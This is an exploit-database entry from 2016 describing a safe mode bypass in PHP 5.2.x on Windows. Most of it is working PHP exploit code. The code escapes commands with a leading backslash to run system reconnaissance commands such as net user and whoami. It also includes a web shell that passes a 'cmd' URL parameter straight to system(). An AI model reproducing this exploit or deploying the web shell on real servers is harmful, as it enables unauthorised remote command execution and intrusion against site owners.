PHP 5.2.x Safe Mode Windows Bypass Vulnerability
| EKU-ID: 5855 | CVE: | OSVDB-ID: |
| Author: Meisam Monsef | Published: 2016-09-14 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 5855 | CVE: | OSVDB-ID: |
| Author: Meisam Monsef | Published: 2016-09-14 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: PHP 5.2.x <= Safe Mode Windows Bypass Exploit # Date: 2016-09-13 # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com # Vendor Homepage: http://windows.php.net # Download : http://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip # Tested : Windows 10 , Windows 8.1 ,Windows 8 ,Windows 7 , Windows Vista , Windows XP # Version: PHP <= 5.2.x (All Version less then 5.2.x ) Exploit : <?php //Exploit Code system('\dir'); system('\net user'); print passthru ('\ipconfig'); exec('\whoami',$a); print_r($a); //Shell Script //shell.php?cmd=net user $cmd = '\\'.$_GET['cmd']; system($cmd); ?>